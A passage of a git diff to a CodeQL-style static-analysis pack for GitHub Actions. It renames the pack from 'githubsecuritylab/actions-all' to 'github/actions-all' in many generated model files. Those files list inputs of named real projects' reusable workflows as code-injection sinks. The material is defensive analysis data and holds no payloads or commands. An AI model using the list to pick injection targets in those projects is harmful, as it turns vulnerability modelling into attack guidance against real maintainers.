"input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index d246f4ce6444..b14db181cce9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index a35a1a628e6b..6a883e369c02 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index ec22645570f7..9612750345dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index e0eccb26a54b..2c6f4438846e 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 5f85bb1a91ab..109b1fefa7b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 7f1af3242605..87f8bc706b6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index b06b390e718f..4c2f4e391b55 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index d5746b566cc6..e3e0a3460d47 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index fbe9e286d2b4..01539c4329ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6ba2fc75375d..d26e49d3ef88 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 6d522b776dcd..f5b370e3d593 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index c210f350439a..72659e362711 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 81eeb82033cf..f37d70a718d6 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6d81f2ff242a..3b4ed4b18b57 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index b7ea7250825c..3dddb9bd3f9e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 972b6f15baa4..49654eb84b87 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 07f0c5c0f691..f46bcbee1b34 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 6bbf33e7f89a..e3791339c035 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 165965dd568a..f5f6c919cfbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 3d1e182458e1..4747cd57c4d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 689cc91871ab..3b68ca76fe2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 0481c04cb671..62b99c23ff64 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 8c0c944a3937..84347b6cbfaf 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 8f4c44324088..32a3d5061e27 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 9406f7d299cf..d4ffc373678e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 36838ef4ddb1..5a5d3999ca75 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 8b16601e6c22..9983ea4eee2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8db2ff568de..e8acf5f2c3cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index 208e444adebc..bd7494ab69a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 41edf0b03737..89b60a4ac845 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index faca7973f1f1..7c72cb57dca6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 76db6821c5e6..2e9681cb21eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 383a88ed0556..d30f1bb7bba0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index bcd3b09ed688..85771a98962a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 53e16f8771a4..194ac90b6482 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index 4310e028de16..d013a9c1b8f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 84d2f57a3fbc..57d88f541865 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 7debf6960edc..312d9e193e7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index 640180b870af..b62903a97e93 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 7ea3039b552b..e983a4a6c985 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index ced66aee32f6..4a45392e15d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index e63440d1fcae..ac20cdeeb3d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f7021148c514..f6876b3bc56c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 8345368057c7..9785efe9637c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3754ebfa63d1..3197652aadc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index 3e35747b558a..f0ebfa177242 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index a13f6863caa5..74afc5c0cc54 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index af5c300ea8bd..fa145f6b6257 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index 449ea8b7b490..ab486b47df26 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - 